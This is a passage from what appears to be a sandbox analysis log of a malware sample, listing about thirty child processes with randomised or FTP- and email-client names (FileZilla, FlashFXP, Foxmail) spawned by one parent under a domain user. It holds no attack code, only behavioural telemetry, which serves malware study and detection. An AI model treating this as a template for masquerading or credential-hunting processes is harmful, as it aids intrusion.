office\\desired.exe" page_root = "0x66855000" os_pid = "0xc4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files\\Microsoft Office\\desired.exe\" " cur_dir = "C:\\Program Files\\Microsoft Office\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 425 os_tid = 0x7b8 Thread: id = 426 os_tid = 0x670 Process: id = "55" image_name = "median_disable.exe" filename = "c:\\program files (x86)\\microsoft.net\\median_disable.exe" page_root = "0x67ea7000" os_pid = "0x70c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files (x86)\\Microsoft.NET\\median_disable.exe\" " cur_dir = "C:\\Program Files (x86)\\Microsoft.NET\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 427 os_tid = 0x568 Thread: id = 428 os_tid = 0x71c Process: id = "56" image_name = "executed_florists.exe" filename = "c:\\program files\\msbuild\\executed_florists.exe" page_root = "0x673bb000" os_pid = "0x434" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files\\MSBuild\\executed_florists.exe\" " cur_dir = "C:\\Program Files\\MSBuild\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 429 os_tid = 0x43c Thread: id = 430 os_tid = 0x180 Process: id = "57" image_name = "midi.exe" filename = "c:\\program files (x86)\\windows media player\\midi.exe" page_root = "0x67093000" os_pid = "0x7a8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files (x86)\\Windows Media Player\\midi.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Media Player\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 431 os_tid = 0xa50 Thread: id = 432 os_tid = 0x53c Process: id = "58" image_name = "specifies-improve-donated.exe" filename = "c:\\program files\\windows media player\\specifies-improve-donated.exe" page_root = "0x676ca000" os_pid = "0x564" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files\\Windows Media Player\\specifies-improve-donated.exe\" " cur_dir = "C:\\Program Files\\Windows Media Player\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 433 os_tid = 0xc0 Thread: id = 434 os_tid = 0x604 Process: id = "59" image_name = "told.exe" filename = "c:\\program files\\windows mail\\told.exe" page_root = "0x668f3000" os_pid = "0x560" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files\\Windows Mail\\told.exe\" " cur_dir = "C:\\Program Files\\Windows Mail\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 435 os_tid = 0x9d8 Thread: id = 436 os_tid = 0x2c4 Process: id = "60" image_name = "salademirates.exe" filename = "c:\\program files\\windows nt\\salademirates.exe" page_root = "0x65306000" os_pid = "0x23c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files\\Windows NT\\salademirates.exe\" " cur_dir = "C:\\Program Files\\Windows NT\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 437 os_tid = 0x9dc Thread: id = 438 os_tid = 0x240 Process: id = "61" image_name = "flowers-anytime-pollution.exe" filename = "c:\\program files (x86)\\windows photo viewer\\flowers-anytime-pollution.exe" page_root = "0x6621a000" os_pid = "0x1c0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\flowers-anytime-pollution.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Photo Viewer\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 439 os_tid = 0x9e4 Thread: id = 440 os_tid = 0x7d0 Process: id = "62" image_name = "compatible-league-rates.exe" filename = "c:\\program files\\internet explorer\\compatible-league-rates.exe" page_root = "0x6612e000" os_pid = "0x7c8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files\\Internet Explorer\\compatible-league-rates.exe\" " cur_dir = "C:\\Program Files\\Internet Explorer\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 441 os_tid = 0x9e8 Thread: id = 442 os_tid = 0x7d4 Process: id = "63" image_name = "ricky.exe" filename = "c:\\program files (x86)\\windows nt\\ricky.exe" page_root = "0x65c41000" os_pid = "0x788" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files (x86)\\Windows NT\\ricky.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows NT\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 443 os_tid = 0x9c0 Thread: id = 444 os_tid = 0x15c Process: id = "64" image_name = "achieved hh apollo.exe" filename = "c:\\program files (x86)\\common files\\achieved hh apollo.exe" page_root = "0x65454000" os_pid = "0x484" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files (x86)\\Common Files\\achieved hh apollo.exe\" " cur_dir = "C:\\Program Files (x86)\\Common Files\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 445 os_tid = 0x9b0 Thread: id = 446 os_tid = 0x7cc Process: id = "65" image_name = "adobe.exe" filename = "c:\\program files (x86)\\internet explorer\\adobe.exe" page_root = "0x65368000" os_pid = "0x138" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files (x86)\\Internet Explorer\\adobe.exe\" " cur_dir = "C:\\Program Files (x86)\\Internet Explorer\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 447 os_tid = 0x9a0 Thread: id = 448 os_tid = 0x790 Process: id = "66" image_name = "austriaallowance.exe" filename = "c:\\program files (x86)\\reference assemblies\\austriaallowance.exe" page_root = "0x6537b000" os_pid = "0x79c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files (x86)\\Reference Assemblies\\austriaallowance.exe\" " cur_dir = "C:\\Program Files (x86)\\Reference Assemblies\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 449 os_tid = 0x990 Thread: id = 450 os_tid = 0x5dc Process: id = "67" image_name = "enormous width william.exe" filename = "c:\\program files\\windows nt\\enormous width william.exe" page_root = "0x671a9000" os_pid = "0x7f4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files\\Windows NT\\enormous width william.exe\" " cur_dir = "C:\\Program Files\\Windows NT\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 451 os_tid = 0x980 Thread: id = 452 os_tid = 0x774 Process: id = "68" image_name = "component.exe" filename = "c:\\program files\\windows journal\\component.exe" page_root = "0x659d6000" os_pid = "0x7e0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files\\Windows Journal\\component.exe\" " cur_dir = "C:\\Program Files\\Windows Journal\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 453 os_tid = 0x970 Thread: id = 454 os_tid = 0x7ec Process: id = "69" image_name = "tar_files.exe" filename = "c:\\program files (x86)\\uninstall information\\tar_files.exe" page_root = "0x64cee000" os_pid = "0x640" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files (x86)\\Uninstall Information\\tar_files.exe\" " cur_dir = "C:\\Program Files (x86)\\Uninstall Information\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 455 os_tid = 0x960 Thread: id = 456 os_tid = 0x48c Process: id = "70" image_name = "query.exe" filename = "c:\\program files\\microsoft sql server compact edition\\query.exe" page_root = "0x64902000" os_pid = "0x7dc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files\\Microsoft SQL Server Compact Edition\\query.exe\" " cur_dir = "C:\\Program Files\\Microsoft SQL Server Compact Edition\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 457 os_tid = 0x950 Thread: id = 458 os_tid = 0x7e4 Process: id = "71" image_name = "3dftp.exe" filename = "c:\\program files (x86)\\microsoft visual studio 8\\3dftp.exe" page_root = "0x65ca4000" os_pid = "0x3b4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\3dftp.exe\" " cur_dir = "C:\\Program Files (x86)\\Microsoft Visual Studio 8\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 459 os_tid = 0x940 Thread: id = 460 os_tid = 0x248 Process: id = "72" image_name = "absolutetelnet.exe" filename = "c:\\program files\\msbuild\\absolutetelnet.exe" page_root = "0x671b7000" os_pid = "0x704" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files\\MSBuild\\absolutetelnet.exe\" " cur_dir = "C:\\Program Files\\MSBuild\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 461 os_tid = 0x930 Thread: id = 462 os_tid = 0x700 Process: id = "73" image_name = "alftp.exe" filename = "c:\\program files\\dvd maker\\alftp.exe" page_root = "0x664cb000" os_pid = "0x694" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files\\DVD Maker\\alftp.exe\" " cur_dir = "C:\\Program Files\\DVD Maker\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 463 os_tid = 0x920 Thread: id = 464 os_tid = 0x4e4 Process: id = "74" image_name = "barca.exe" filename = "c:\\program files\\windows media player\\barca.exe" page_root = "0x65add000" os_pid = "0x734" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files\\Windows Media Player\\barca.exe\" " cur_dir = "C:\\Program Files\\Windows Media Player\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 465 os_tid = 0x910 Thread: id = 466 os_tid = 0x664 Process: id = "75" image_name = "bitkinex.exe" filename = "c:\\program files\\windows mail\\bitkinex.exe" page_root = "0x65af0000" os_pid = "0x688" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files\\Windows Mail\\bitkinex.exe\" " cur_dir = "C:\\Program Files\\Windows Mail\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 467 os_tid = 0x900 Thread: id = 468 os_tid = 0x7b4 Process: id = "76" image_name = "coreftp.exe" filename = "c:\\program files (x86)\\common files\\coreftp.exe" page_root = "0x63d02000" os_pid = "0x414" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files (x86)\\Common Files\\coreftp.exe\" " cur_dir = "C:\\Program Files (x86)\\Common Files\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 469 os_tid = 0x8f0 Thread: id = 470 os_tid = 0x124 Process: id = "77" image_name = "far.exe" filename = "c:\\program files\\windows media player\\far.exe" page_root = "0x65914000" os_pid = "0x90" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files\\Windows Media Player\\far.exe\" " cur_dir = "C:\\Program Files\\Windows Media Player\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 471 os_tid = 0x8e0 Thread: id = 472 os_tid = 0x290 Process: id = "78" image_name = "filezilla.exe" filename = "c:\\program files (x86)\\uninstall information\\filezilla.exe" page_root = "0x64327000" os_pid = "0x780" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files (x86)\\Uninstall Information\\filezilla.exe\" " cur_dir = "C:\\Program Files (x86)\\Uninstall Information\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 473 os_tid = 0x8d0 Thread: id = 474 os_tid = 0x10c Process: id = "79" image_name = "flashfxp.exe" filename = "c:\\program files\\windows sidebar\\flashfxp.exe" page_root = "0x6513a000" os_pid = "0x208" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files\\Windows Sidebar\\flashfxp.exe\" " cur_dir = "C:\\Program Files\\Windows Sidebar\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 475 os_tid = 0x8c0 Thread: id = 476 os_tid = 0x7bc Process: id = "80" image_name = "fling.exe" filename = "c:\\program files (x86)\\windows portable devices\\fling.exe" page_root = "0x6514d000" os_pid = "0x5d4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files (x86)\\Windows Portable Devices\\fling.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Portable Devices\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 477 os_tid = 0x8b0 Thread: id = 478 os_tid = 0x7c0 Process: id = "81" image_name = "foxmailincmail.exe" filename = "c:\\program files\\microsoft office\\foxmailincmail.exe" page_root = "0x64960000" os_pid = "0x36c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files\\Microsoft Office\\foxmailincmail.exe\" " cur_dir = "C:\\Program Files\\Microsoft Office\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 479 os_tid = 0x8a0 Thread: id = 480 os_tid = 0x25c Process: id = "82" image_name = "gmailnotifierpro.exe" filename = "c:\\program files (x86)\\windows sidebar\\gmailnotifierpro.exe" page_root = "0x65172000" os_pid = "0x51c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0x454" cmd_line = "\"C:\\Program Files (x86)\\Windows Sidebar\\gmailnotifierpro.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Sidebar\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT 